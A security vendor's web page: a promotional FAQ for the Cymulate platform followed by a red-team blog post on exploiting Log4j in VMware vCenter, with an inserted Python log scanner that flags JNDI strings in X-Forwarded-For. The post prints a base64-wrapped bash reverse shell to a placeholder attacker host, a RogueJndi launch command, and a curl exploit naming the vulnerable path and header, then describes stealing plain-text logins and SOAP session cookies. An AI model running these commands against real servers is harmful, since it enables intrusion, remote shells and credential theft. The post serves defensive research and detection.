Frequently Asked Questions

Technical Attack Content & Log4j Exploitation

What is the Log4j vulnerability and why is it significant for vCenter security?

The Log4j vulnerability, publicly disclosed in December 2021, allows attackers to execute arbitrary Java code on servers running vulnerable versions of Log4j by exploiting its ability to access LDAP and JNDI servers. This vulnerability is significant for vCenter security because vCenter uses Log4j, making it susceptible to remote code execution attacks that can compromise virtual infrastructure. (Source: Cymulate Blog)

How does Cymulate research attack paths using Log4j in vCenter environments?

Cymulate's research team orchestrates full attack scenarios using Log4j exploits to help customers practice their defenses and responses. The team sets up attack environments, delivers payloads via JNDI LDAP servers, and demonstrates post-exploitation techniques, such as credential dumping and leveraging SOAP sessions for lateral movement within vCenter. (Source: Cymulate Blog)

What tools and dependencies are required to exploit Log4j in vCenter?

To exploit Log4j in vCenter, you need a JNDI LDAP server (such as RogueJndi), a reverse shell handler, and knowledge of the vulnerable headers and paths in vCenter. The attack involves sending a crafted payload to the vCenter server, typically via the 'X-Forwarded-For' HTTP header, to trigger remote code execution. (Source: Cymulate Blog)

How can attackers use vCenter after exploiting Log4j?

After exploiting Log4j, attackers can use vCenter to execute code on virtual machines, dump credentials, and potentially move laterally within the environment. Techniques include using the pyVmomi Python library to interact with vCenter APIs and leveraging stolen tokens or credentials for further exploitation. (Source: Cymulate Blog)

What is credential dumping in the context of vCenter post-exploitation?

Credential dumping involves extracting user credentials from vCenter after gaining access. This can be done by intercepting authentication data, such as the CastleAuthorization header, or by capturing session tokens like vmware_soap_session, which can be used to execute commands without supplying admin credentials. (Source: Cymulate Blog)

How does the authentication process work in vCenter, and how can it be abused?

vCenter authentication typically uses basic auth to validate user credentials, which are then exchanged for a VSPHERE-UI-JSESSIONID cookie. Attackers can intercept these credentials or session tokens to gain unauthorized access and execute commands on virtual machines. (Source: Cymulate Blog)

What is the role of pyVmomi in vCenter exploitation?

pyVmomi is a Python library provided by VMware that allows programmatic interaction with vCenter servers. In exploitation scenarios, attackers can use pyVmomi to execute code on virtual machines after obtaining valid credentials or session tokens. (Source: Cymulate Blog)

How can session tokens be used for lateral movement in vCenter?

Session tokens like vmware_soap_session can be captured and used to authenticate API requests, allowing attackers to execute commands or move laterally within the vCenter environment without needing admin credentials. (Source: Cymulate Blog)

What are the main challenges in post-exploitation of vCenter via Log4j?

Challenges include obtaining valid credentials or session tokens, understanding the flow of authentication data, and bypassing security controls such as TLS termination and proxy configurations. Attackers may need to wait for valid login attempts or find ways to intercept data at the right point in the authentication flow. (Source: Cymulate Blog)

Who contributed to Cymulate's research on Log4j and vCenter attack paths?

Roy Haimof, Security Research Team Lead at Cymulate, contributed to the research and guide on leveraging Log4j to expose vCenter attack paths. (Source: Cymulate Blog)

Where can I find more technical resources and guides from Cymulate?

You can access Cymulate's technical whitepapers, guides, data sheets, and solution briefs in the Resource Hub. These resources cover topics like exposure management, threat validation, detection engineering, and vulnerability management. (Source: Cymulate Resource Hub)

How does Cymulate Exposure Validation help with attack simulation?

Cymulate Exposure Validation enables advanced security testing by allowing users to build and execute custom attack chains in a single platform. It simplifies the process of simulating real-world threats and validating security controls. (Source: Cymulate Data Sheet)

What is the significance of attack path discovery in security validation?

Attack path discovery automates the identification of lateral movement opportunities and privilege escalation risks within an environment. This helps organizations understand and mitigate potential attack vectors before they can be exploited. (Source: Cymulate Attack Path Discovery)

How does Cymulate support detection engineering and SIEM validation?

Cymulate provides tools and guides for building, tuning, and testing SIEM, EDR, and XDR detections to improve mean time to detect and respond to threats. This includes technical resources and webinars on best practices for detection engineering. (Source: Cymulate Detection Engineering)

Where can I read more about Cymulate's research on vulnerabilities like Log4j?

Cymulate regularly publishes research on vulnerabilities, attack techniques, and security validation in their blog. You can find in-depth articles, technical guides, and case studies on recent threats and Cymulate's approach to exposure management. (Source: Cymulate Blog)

How does Cymulate help organizations prepare for real-world attacks?

Cymulate enables organizations to simulate real-world attacks, validate their defenses, and identify exploitable exposures across their IT environments. This proactive approach helps teams stay ahead of emerging threats and improve their overall security posture. (Source: Cymulate Threat Validation)

What is Cymulate's approach to continuous threat exposure management (CTEM)?

Cymulate's CTEM approach integrates validation, prioritization, and mobilization, enabling collaboration across teams to continuously manage and reduce exposure risk. The platform provides actionable metrics and insights to guide remediation efforts. (Source: Cymulate CTEM)

How can I validate my organization's resilience against Log4j and similar vulnerabilities?

Cymulate offers dedicated assessments and simulation scenarios for vulnerabilities like Log4j, allowing organizations to test their defenses, validate controls, and identify gaps in their security posture. (Source: Cymulate Log4j Resilience Assessment)

Features & Capabilities

What are the key features of the Cymulate platform?

Cymulate offers continuous threat validation, unified exposure management, AI-powered optimization, complete kill chain coverage, attack path discovery, automated mitigation, and cloud validation. The platform is designed to simulate real-world threats, prioritize exposures, and automate remediation. (Source: Cymulate Homepage)

Does Cymulate integrate with other security tools?

Yes, Cymulate integrates with a wide range of security technologies, including Akamai Guardicore, AWS GuardDuty, BlackBerry Cylance OPTICS, Carbon Black EDR, Check Point CloudGuard, Cisco Secure Endpoint, CrowdStrike Falcon, Wiz, and more. For a complete list, visit the Partnerships and Integrations page. (Source: Cymulate Integrations)

What technical documentation is available for Cymulate?

Cymulate provides whitepapers, guides, data sheets, solution briefs, and reports covering topics such as exposure management, threat validation, detection engineering, and vulnerability management. Access these resources in the Resource Hub. (Source: Cymulate Resource Hub)

How easy is Cymulate to use and implement?

Cymulate is designed for quick, agentless deployment with minimal resources required. Customers report that the platform is intuitive and easy to use, with support available via email and chat. Implementation can begin almost immediately after deployment. (Source: Customer Testimonials, Cymulate)

What security and compliance certifications does Cymulate hold?

Cymulate is SOC2 Type II certified and complies with ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1. The platform is GDPR compliant and hosted in secure AWS data centers with strong encryption and high availability. (Source: Security at Cymulate)

How does Cymulate ensure data security and privacy?

Cymulate incorporates data protection by design, with a dedicated privacy and security team, secure development lifecycle, continuous vulnerability scanning, and annual third-party penetration tests. Data is encrypted in transit (TLS 1.2+) and at rest (AES-256). (Source: Security at Cymulate)

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive interface and ease of use. For example, Raphael Ferreira, Cybersecurity Manager at Banco PAN, stated, "Cymulate is easy to implement and use—all you need to do is click a few buttons, and you receive a lot of practical insights into how you can improve your security posture." (Source: Customer Testimonials, Cymulate)

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model tailored to each organization's needs. Pricing depends on the selected package, number of assets, and scenarios. For a detailed quote, you can schedule a demo with Cymulate's team. (Source: Cymulate Pricing Model)

What business impact can customers expect from using Cymulate?

Customers have reported an 81% reduction in cyber risk within four months, a 60% increase in team efficiency, 40X faster threat validation, a 30% improvement in threat prevention, and a 52% reduction in critical exposures. (Source: Hertz Israel Case Study)

Competition & Comparison

How does Cymulate compare to AttackIQ?

Cymulate offers the industry's leading threat scenario library and AI-powered capabilities for workflow automation and security posture improvement. AttackIQ provides automated security validation but lacks Cymulate's innovation, threat coverage, and ease of use. (Source: Cymulate vs AttackIQ)

How does Cymulate differ from Mandiant Security Validation?

Mandiant Security Validation is one of the original BAS platforms but has seen minimal innovation in recent years. Cymulate continually innovates with AI and automation, expanding into exposure management and maintaining a leadership position in the market. (Source: Cymulate vs Mandiant)

What makes Cymulate different from Pentera?

Pentera focuses on attack path validation but lacks the depth of Cymulate's exposure validation, which covers the full kill chain and cloud control validation. Cymulate provides a more comprehensive solution for exposure management. (Source: Cymulate vs Pentera)

How does Cymulate compare to Picus Security?

Picus Security is suitable for organizations seeking an on-premise BAS vendor, while Cymulate is ideal for those needing a complete exposure validation platform with full kill chain and cloud control validation. (Source: Cymulate vs Picus)

What are the advantages of Cymulate over SafeBreach?

Cymulate outpaces SafeBreach with unmatched innovation, precision, and automation. It offers the industry's largest attack library, a full CTEM solution, and comprehensive exposure validation. (Source: Cymulate vs SafeBreach)

How does Cymulate compare to Scythe?

Scythe is suitable for advanced red teams building custom attack campaigns, but Cymulate provides a more complete exposure validation platform with automated mitigation, continuous validation, and a library of over 100,000 attack actions. (Source: Cymulate vs Scythe)

Use Cases & Benefits

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams in organizations across industries such as media, transportation, and financial services. (Source: Cymulate Personas)

What problems does Cymulate solve for security teams?

Cymulate addresses overwhelming threat volumes, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers by providing continuous threat validation, exposure prioritization, and automation. (Source: Cymulate Pain Points)

How does Cymulate tailor its solutions for different personas?

Cymulate provides CISOs with quantifiable metrics, automates processes for SecOps teams, offers advanced offensive testing for red teams, and consolidates insights for vulnerability management teams. Each persona receives solutions tailored to their specific challenges. (Source: Cymulate Personas)

What is the primary purpose of Cymulate's platform?

The primary purpose of Cymulate is to harden defenses and optimize security controls by proactively validating controls, threats, and response capabilities, helping organizations focus on exploitable exposures and strengthen their security posture. (Source: Cymulate Platform Overview)

What is Cymulate's vision and mission?

Cymulate's mission is to empower organizations to manage their security posture proactively and effectively, driving lasting change in cybersecurity through continuous exposure management and threat validation. (Source: About Cymulate)

Where can I find Cymulate's latest blog posts and research?

You can read Cymulate's latest blog posts, research, and news at the Cymulate Blog and Newsroom. (Source: Cymulate Blog & Newsroom)

How can I contact Cymulate for support or a demo?

You can contact Cymulate for support via email at [email protected], use chat support, or schedule a demo through the website. (Source: Cymulate Contact)

What is Cymulate's company background and global presence?

Cymulate was founded in 2016 and serves over 1,000 customers in 50 countries, with offices in 8 locations worldwide. The company is recognized for its innovative solutions and customer-centric approach. (Source: About Cymulate)


How to Leverage Log4j to Expose vCenter Attack Paths - Part 1

Last Updated: December 16, 2024

As Log4j hit the industry, we found ourselves orchestrating full attack scenarios for our customers to practice their defenses and responses. 

While working on an attack vector from VMware vCenter to Domain Admin, we realized we were missing some tools to abuse a specific path we had in mind. 

This minor obstacle gave us the excuse we needed to kickstart our research into VMware Post-Exploitation and the development of our modest toolkit which we will release later. 

 

History 

Log4j is a popular logging utility that made headlines last December following the public disclosure of a vulnerability that potentially allows attackers to execute code remotely on a targeted machine. The vulnerability abuses Log4j's ability to perform JNDI lookups against arbitrary LDAP servers, allowing attackers to execute arbitrary Java code on servers that host vulnerable versions of the software.

Amazon, Microsoft, and VMware were among the many leading companies affected, not to mention the hundreds of thousands of less prominent organizations and companies.

We decided to focus our research on the post-exploitation stages of an attack and looked for a worthy opponent on which we could inflict some considerable damage.

Enter vCenter 

vCenter Server is the centralized management utility for VMware that controls VMs, ESXi hosts, and all other components from a single location.

As it so happens, vCenter uses log4j and, therefore, was a perfect candidate for our research. 

 

Log4j Exploitation Dependencies 

The first couple of steps we took were focused on setting up an attack environment and included:

  • A JNDI LDAP server to deliver the payload.
  • A reverse shell handler to control the victim once exploited.

For the JNDI server, we used this GitHub repo and set up the attack server to host a reverse shell payload:

COMMAND_B64=$(echo "bash -i >& /dev/tcp/<ATTACK_SRV_ADDR>/<PORT> 0>&1" | base64)

java -jar RogueJndi-1.1.jar -c "bash -c {echo,\$COMMAND_B64}|{base64,-d}|{bash,-i}" --hostname "0.0.0.0" -l "1389"

image

For the listener, we:  

  • wrote a short Python script to listen for an incoming connection.  
  • created an HTTP C2 to control the established connection.

Exploitation: 

To exploit the log4j vulnerability, we had to know what part of our request would be written into the log. Our goal was to get a JNDI payload written into the log and trigger the vulnerability:

Payload: 

 ${jndi:ldap://<attack_server>:<server_port>/<attack_server_path>}

Thanks to this cool tweet, we didn’t have to tinker with vCenter ourselves to find the vulnerable header and path needed to exploit the vCenter server:

Path:

 /websso/SAML2/SLO/vsphere.local?SAMLRequest=HTTP/2

Header:

 X-Forwarded-For

And so, our final exploit is a simple curl command:

curl https://<vcenter_ip>:443/websso/SAML2/SLO/vsphere.local?SAMLRequest=HTTP/2 -H 'X-Forwarded-For: ${jndi:ldap://<attack_server>:<server_port>/<attack_server_path>}' --insecure

After we sent the request, we expected a reverse shell connection to be made to our c2. 
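From the defender's side, the same request is easy to spot: X-Forwarded-For should only ever carry IP addresses, so a JNDI lookup string (or anything else that is not an IP list) on the vCenter SSO path is a clear signal. The scanner below is an added example, not code from the original post; the access-log format and the sample lines are constructed for illustration and do not reproduce vCenter's or Envoy's real log layout.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed sample access log (not real vCenter/Envoy output); each line logs
# the request line and the X-Forwarded-For value as xff="...".
SAMPLE_LOG = """\
10.0.0.5 - - [16/Dec/2021:10:01:02 +0000] "GET /ui/ HTTP/1.1" 200 xff="10.0.0.5"
203.0.113.7 - - [16/Dec/2021:10:01:09 +0000] "GET /websso/SAML2/SLO/vsphere.local?SAMLRequest= HTTP/1.1" 400 xff="${jndi:ldap://203.0.113.7:1389/a}"
198.51.100.3 - - [16/Dec/2021:10:02:11 +0000] "GET /websso/SAML2/SSO/vsphere.local HTTP/1.1" 302 xff="198.51.100.3, 10.0.0.1"
192.0.2.9 - - [16/Dec/2021:10:03:15 +0000] "GET /websso/SAML2/SLO/vsphere.local HTTP/1.1" 400 xff="${JNDI:LDAP://192.0.2.9/x}"
192.0.2.10 - - [16/Dec/2021:10:04:00 +0000] "GET /ui/ HTTP/1.1" 200 xff="not-an-ip"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) xff="(?P<xff>[^"]*)"$'
)
# The lookup prefix quoted in the post, matched case-insensitively.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
SSO_PREFIX = "/websso/"  # the SSO endpoint family named in the post

def _is_ip_list(value: str) -> bool:
    """X-Forwarded-For should only ever be a comma-separated list of IPs."""
    try:
        for part in value.split(","):
            ipaddress.ip_address(part.strip())
    except ValueError:
        return False
    return True

def classify(line: str) -> Optional[Dict]:
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    xff, path = m.group("xff"), m.group("path")
    reasons: List[str] = []
    if JNDI_RE.search(xff):
        reasons.append("jndi-lookup")
    if not _is_ip_list(xff):
        reasons.append("xff-not-ip")
    if reasons and path.startswith(SSO_PREFIX):
        reasons.append("websso-path")
    severity = "high" if "jndi-lookup" in reasons else ("medium" if reasons else "none")
    return {"src": m.group("src"), "ts": m.group("ts"), "path": path,
            "xff": xff, "reasons": reasons, "severity": severity}

def scan_log(text: str) -> List[Dict]:
    """Return only the lines that raised at least one reason, in log order."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = classify(line)
        if f is not None and f["reasons"]:
            findings.append(f)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['src']:14} {f['path']}  reasons={f['reasons']}")
```

Running it on the constructed sample flags the two lookup attempts as high and the malformed header as medium, while the two legitimate lines are ignored.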

 

Now What?

The obvious thing we had in mind was that we could use vCenter to execute code on virtual machines.  

This is a good time to mention that VMware has released a Python library called pyVmomi that can help us communicate more efficiently with the vCenter server. 

First, we created an authenticated object by supplying administrative user credentials: 

image

Next, we supplied the VM creds for the context of the code execution: 

image

Then we created the program spec:

image

And finally, we executed the command: 

image

But wait, how are we supposed to get the username and password for the administrator? 

 

General Auth: 

Before trying to steal the credentials, we needed to understand how the authentication works. 

When a user authenticates to the server, they send their credentials through basic auth. If the server considers them valid, it signs a SAML auth request which the user can then exchange for the VSPHERE-UI-JSESSIONID cookie.

image

To steal these credentials, we had to identify the best place to capture them once they reach the server.

To find a target, we used netstat to understand the flow of data to and from the server. 

Vpxd, the main vCenter service, doesn’t listen for incoming connections directly but uses Envoy as a proxy instead. Reading VMware's documentation showed us that the config of Envoy is derived from rhttpproxy:

image

The most interesting part of rhttpproxy’s config is:

image

 

Credential Dumping 

Once we had a better understanding of the general flow of data to and from the server, we had a few targets to tinker with: 

  1. We could try to get the data from Envoy after TLS termination. 
  2. We could try to MitM the vpxd-webserver-pipe. 
  3. We could try to get the data from vpxd when it reads the data. 

First, we tried to authenticate while debugging the Envoy process with a trace in the background, looking for any HTTP data.

After several attempts, we managed to capture the stripped HTTP data containing CastleAuthorization: 

image

From the data in the CastleAuthorization header, we could base64-decode the user and password, enabling us to extract plain-text credentials for any user that logs in.

Although the method above achieves the goal of giving us credentials, we still needed to wait for a valid login request, which can take some time. 

 

SOAP Sessions 

Impatient as we are, we decided to dig further and examine other requests passing by the proxy.
One of these requests looked especially interesting: 

image

The request is authenticated with the vmware_soap_session cookie, the cookie generated when authenticating to the Web Services API.
This means that we could potentially use the token to execute commands without supplying admin creds.

We needed to make a few adjustments, as pyVmomi doesn’t support connecting with a stolen token:

image

That enabled us to execute code on a remote VM supplying only the VM user and password: 

image

 

What’s Next? 

Obviously, the need for the VM creds is quite annoying as it limits what we can do. We were not going to stand for that! 

In the next blog post, we’ll showcase our post-exploitation toolkit for vCenter.

 

---

Thanks to Roy Haimof, Security Research Team Lead for Cymulate for the information provided in this guide. An experienced cyber security specialist with a demonstrated history of team-leading in the military industry, Roy is passionate about helping others stay sharp against evolving cyber threats.

 
